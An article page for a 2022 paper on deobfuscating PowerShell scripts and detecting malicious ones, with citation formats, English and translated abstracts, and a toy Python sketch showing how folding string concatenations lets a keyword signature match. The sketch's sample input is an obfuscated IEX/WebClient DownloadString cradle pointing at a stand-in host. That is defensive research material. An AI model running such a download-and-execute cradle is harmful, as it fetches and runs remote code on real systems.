Journal of Zhejiang University

Frontiers of Information Technology & Electronic Engineering 2022 Vol.23 No.3 P.361-381

http://doi.org/10.1631/FITEE.2000436

Generic, efficient, and effective deobfuscation and semantic-aware attack detection for PowerShell scripts

Author(s): Chunlin XIONG, Zhenyuan LI, Yan CHEN, Tiantian ZHU, Jian WANG, Hai YANG, Wei RUAN
Affiliation(s): 1. College of Computer Science and Technology, Zhejiang University, Hangzhou 310027, China
Corresponding email(s): chunlinxiong94@zju.edu.cn, ruanwei@zju.edu.cn
Key Words: PowerShell, Abstract syntax tree, Obfuscation and deobfuscation, Malicious script detection

Chunlin XIONG, Zhenyuan LI, Yan CHEN, Tiantian ZHU, Jian WANG, Hai YANG, Wei RUAN. Generic, efficient, and effective deobfuscation and semantic-aware attack detection for PowerShell scripts[J]. Frontiers of Information Technology & Electronic Engineering, 2022, 23(3): 361-381.

@article{Xiong2022,
title="Generic, efficient, and effective deobfuscation and semantic-aware attack detection for PowerShell scripts",
author="Chunlin XIONG and Zhenyuan LI and Yan CHEN and Tiantian ZHU and Jian WANG and Hai YANG and Wei RUAN",
journal="Frontiers of Information Technology & Electronic Engineering",
volume="23",
number="3",
pages="361-381",
year="2022",
publisher="Zhejiang University Press & Springer",
doi="10.1631/FITEE.2000436"
}

%0 Journal Article
%T Generic, efficient, and effective deobfuscation and semantic-aware attack detection for PowerShell scripts
%A Chunlin XIONG
%A Zhenyuan LI
%A Yan CHEN
%A Tiantian ZHU
%A Jian WANG
%A Hai YANG
%A Wei RUAN
%J Frontiers of Information Technology & Electronic Engineering
%V 23
%N 3
%P 361-381
%@ 2095-9184
%D 2022
%I Zhejiang University Press & Springer
%DOI 10.1631/FITEE.2000436

TY - JOUR
T1 - Generic, efficient, and effective deobfuscation and semantic-aware attack detection for PowerShell scripts
A1 - Chunlin XIONG
A1 - Zhenyuan LI
A1 - Yan CHEN
A1 - Tiantian ZHU
A1 - Jian WANG
A1 - Hai YANG
A1 - Wei RUAN
JO - Frontiers of Information Technology & Electronic Engineering
VL - 23
IS - 3
SP - 361
EP - 381
SN - 2095-9184
Y1 - 2022
PB - Zhejiang University Press & Springer
DO - 10.1631/FITEE.2000436
ER -

Abstract: In recent years, PowerShell has increasingly been reported in a variety of cyber attacks. However, because the PowerShell language is dynamic by design and can construct script fragments at different levels, state-of-the-art PowerShell attack detection approaches based on static analysis are inherently vulnerable to obfuscation. In this paper, we design the first generic, effective, and lightweight deobfuscation approach for PowerShell scripts. To precisely identify the obfuscated script fragments, we define obfuscation based on the differences in its impact on the abstract syntax trees of PowerShell scripts, and we propose a novel emulation-based recovery technology. Furthermore, we design the first semantic-aware PowerShell attack detection system, which leverages the classic objective-oriented association mining algorithm and newly identifies 31 semantic signatures. Experimental results on 2342 benign samples and 4141 malicious samples show that our deobfuscation method takes less than 0.5 s on average and increases the similarity between the obfuscated and original scripts from 0.5% to 93.2%. With our deobfuscation method deployed, the attack detection rates of Windows Defender and VirusTotal increase substantially, from 0.33% and 2.65% to 78.9% and 94.0%, respectively. Moreover, our detection system outperforms both existing tools, with a 96.7% true positive rate and a 0% false positive rate on average.
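The abstract's core observation, that static signatures miss obfuscated fragments until those fragments are evaluated and put back into the script, can be illustrated with a toy sketch. This is not the paper's method: the paper locates fragments through the abstract syntax tree and recovers them by emulation, whereas the sketch below assumes a single obfuscation style (concatenation of single-quoted string literals) and uses a regular expression. The function names, the pattern, and the sample script are all hypothetical.

```python
import re

# Hypothetical toy pattern: two or more single-quoted literals joined by '+',
# e.g. 'Down'+'load'+'String'. This is not a PowerShell parser.
CONCAT = re.compile(r"'[^']*'(?:\s*\+\s*'[^']*')+")


def fold_concatenations(script: str) -> str:
    """Replace each concatenation of string literals with its joined value."""
    def join(match: re.Match) -> str:
        parts = re.findall(r"'([^']*)'", match.group(0))
        return "'" + "".join(parts) + "'"
    return CONCAT.sub(join, script)


def matches_signature(script: str, keyword: str) -> bool:
    """Naive static signature: case-insensitive substring match."""
    return keyword.lower() in script.lower()


# Assumed sample: a download call whose method name is split into pieces.
obfuscated = (
    "IEX (New-Object Net.WebClient)."
    "('Down'+'load'+'Str'+'ing')('http://example.invalid/a')"
)
recovered = fold_concatenations(obfuscated)

print(matches_signature(obfuscated, "DownloadString"))  # signature misses
print(matches_signature(recovered, "DownloadString"))   # signature hits
```

The keyword match fails on the obfuscated string and succeeds once the concatenation is folded, which is the effect the reported detection-rate increases describe at scale. A regular expression cannot handle encodings, reordering, or nested invocations, so it should not be read as a substitute for AST-level analysis.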

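A generic, effective, and lightweight PowerShell deobfuscation and semantic-aware attack detection method

Chunlin XIONG¹, Zhenyuan LI¹, Yan CHEN², Tiantian ZHU³, Jian WANG¹, Hai YANG⁴, Wei RUAN⁵
¹College of Computer Science and Technology, Zhejiang University, Hangzhou 310027, China
²Department of Electrical Engineering and Computer Science, Northwestern University, Evanston, IL 60208, USA
³College of Computer Science and Technology, Zhejiang University of Technology, Hangzhou 310023, China
⁴Hangzhou Qidun Information Technology Co., Ltd. (杭州奇盾信息技术有限公司), Hangzhou 310027, China
⁵College of Control Science and Engineering, Zhejiang University, Hangzhou 310027, China
Abstract: In recent years, PowerShell attacks have been reported with increasing frequency. However, because the PowerShell language is dynamic and can construct script fragments at different levels, even PowerShell attack detection methods based on state-of-the-art static script analysis are inherently susceptible to obfuscation. This paper designs a generic, effective, and lightweight deobfuscation method for PowerShell scripts. First, to precisely identify obfuscated script fragments, a novel obfuscated-fragment detection method is proposed based on the impact of obfuscation methods on the PowerShell abstract syntax tree, and an emulation-based recovery technique is built on top of it. In addition, a semantic-aware PowerShell attack detection system is designed; it uses the classic objective-oriented association mining algorithm and newly identifies 31 semantic signatures for malicious script detection. Experimental results on 2342 benign samples and 4141 malicious samples show that the proposed deobfuscation method takes less than 0.5 s on average and raises the similarity between the obfuscated and original scripts from 0.5% to 93.2%. With this deobfuscation method, the attack detection rates of Windows Defender and VirusTotal rise from 0.33% and 2.65% to 78.9% and 94.0%, respectively. The experiments also show that our detection system outperforms both existing tools (average true positive rate of 96.7% and false positive rate of 0%).

Key words: PowerShell; Abstract syntax tree; Obfuscation and deobfuscation; Malicious script detection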
